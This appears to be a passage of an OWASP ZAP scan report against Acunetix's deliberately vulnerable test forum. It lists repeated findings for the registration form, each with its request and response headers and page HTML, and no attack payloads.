class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:33 GMT Content-Length: 3554 |
| Response Body - size: 3,554 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 3549 |
| Response Body - size: 3,549 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 3549 |
| Response Body - size: 3,549 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 3549 |
| Response Body - size: 3,549 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=10 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=11 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
